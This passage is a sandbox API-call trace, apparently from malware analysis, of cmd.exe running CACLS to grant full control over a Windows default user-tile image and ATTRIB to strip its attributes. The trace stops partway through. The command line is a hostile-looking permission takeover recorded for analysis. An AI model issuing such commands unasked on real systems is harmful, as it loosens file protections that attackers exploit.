[0185.837] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.837] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.838] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.838] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.838] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.838] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0185.838] GetEnvironmentStringsW () returned 0x3a0308* [0185.838] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0185.838] GetEnvironmentStringsW () returned 0x3a0308* [0185.838] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0185.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e77c | out: phkResult=0x26e77c*=0x40) returned 0x0 [0185.838] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0xb8, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.838] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x1, lpcbData=0x26e780*=0x4) returned 0x0 [0185.838] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x1, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x0, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x40, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x40, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x40, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegCloseKey (hKey=0x40) returned 0x0 [0185.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e77c | out: phkResult=0x26e77c*=0x40) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x40, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x1, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x1, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x0, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x9, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x9, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x9, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegCloseKey (hKey=0x40) returned 0x0 [0185.839] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886394 [0185.839] srand (_Seed=0x5b886394) [0185.839] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"" [0185.839] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"" [0185.840] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.840] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0185.840] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.840] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.840] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.840] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0185.840] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0185.840] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0185.840] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0185.840] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0185.840] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0185.840] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0185.840] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0185.840] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0185.840] GetEnvironmentStringsW () returned 0x3a2458* [0185.840] FreeEnvironmentStringsW (penv=0x3a2458) returned 1 [0185.840] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.841] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.841] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0185.841] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0185.841] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0185.841] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0185.841] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0185.841] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0185.841] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0185.841] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0185.841] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f548 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.841] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f548, lpFilePart=0x26f544 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f544*="Desktop") returned 0x18 [0185.841] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.841] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f2c4 | out: lpFindFileData=0x26f2c4) returned 0x3a0ae8 [0185.841] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0185.841] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f2c4 | out: lpFindFileData=0x26f2c4) returned 0x3a0ae8 [0185.841] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0185.841] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f2c4 | out: lpFindFileData=0x26f2c4) returned 0x3a0ae8 [0185.841] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0185.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.842] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0185.842] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0185.842] GetEnvironmentStringsW () returned 0x3a0308* [0185.842] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0185.842] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.842] GetConsoleOutputCP () returned 0x1b5 [0185.842] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.842] GetUserDefaultLCID () returned 0x409 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f688, cchData=128 | out: lpLCData="0") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f688, cchData=128 | out: lpLCData="0") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f688, cchData=128 | out: lpLCData="1") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0185.843] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0185.844] GetConsoleTitleW (in: lpConsoleTitle=0x3909b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.844] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.844] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0185.844] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0185.844] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0185.845] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0185.845] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0185.845] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0185.845] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0185.845] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0185.845] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0185.845] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0185.845] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0185.848] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0185.848] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0185.848] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0185.848] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0185.848] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0185.848] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0185.848] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0185.850] GetConsoleTitleW (in: lpConsoleTitle=0x26f31c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.850] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.850] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.850] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.850] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.850] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.851] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.851] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.851] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.851] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.851] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.851] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.851] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.851] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.851] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.851] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.851] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.851] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.851] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.851] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.851] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.851] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.851] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.851] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.851] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.851] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.851] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.851] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.851] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.851] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.851] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.851] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.851] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.851] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.851] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.851] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.851] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.851] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.851] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.851] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.851] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.851] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.851] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.851] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.851] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.851] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.852] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.852] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.852] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.852] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.852] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.852] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.852] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.852] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.859] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.859] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.859] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.859] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.859] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.859] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.859] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.859] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.859] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.859] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.859] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.859] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.859] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.859] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.859] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.859] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.859] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.859] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.859] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.859] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.859] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.859] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.859] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.859] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.859] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.860] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.860] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0185.860] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0185.860] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0185.860] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0185.860] SetErrorMode (uMode=0x0) returned 0x0 [0185.860] SetErrorMode (uMode=0x1) returned 0x0 [0185.860] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a1e98, lpFilePart=0x26ee3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ee3c*="Desktop") returned 0x18 [0185.860] SetErrorMode (uMode=0x0) returned 0x1 [0185.860] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.860] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.865] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.866] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.866] GetLastError () returned 0x2 [0185.866] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.866] GetLastError () returned 0x2 [0185.866] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0x3a2180 [0185.866] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0185.866] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.867] GetLastError () returned 0x2 [0185.867] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0x3a2180 [0185.867] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0185.867] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.867] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.867] GetConsoleTitleW (in: lpConsoleTitle=0x26f0b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.868] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f000 | out: lpAttributeList=0x26ef38, lpSize=0x26f000) returned 1 [0185.868] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eff8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef38, lpPreviousValue=0x0) returned 1 [0185.868] GetStartupInfoW (in: lpStartupInfo=0x26eef4 | out: lpStartupInfo=0x26eef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.868] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.869] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ef94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efe0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x26efe0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xff4, dwThreadId=0xeec)) returned 1 [0185.871] CloseHandle (hObject=0x4c) returned 1 [0185.871] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.871] GetEnvironmentStringsW () returned 0x3a0308* [0185.871] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0185.871] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0185.906] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26eed4 | out: lpExitCode=0x26eed4*=0x0) returned 1 [0185.906] CloseHandle (hObject=0x50) returned 1 [0185.906] _vsnwprintf (in: _Buffer=0x26f01c, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eee0 | out: _Buffer="00000000") returned 8 [0185.906] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.906] GetEnvironmentStringsW () returned 0x3a2410* [0185.906] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.906] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.906] GetEnvironmentStringsW () returned 0x3a2410* [0185.906] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.906] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef38 | out: lpAttributeList=0x26ef38) [0185.906] GetConsoleTitleW (in: lpConsoleTitle=0x26f31c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.906] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.906] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.908] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.908] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 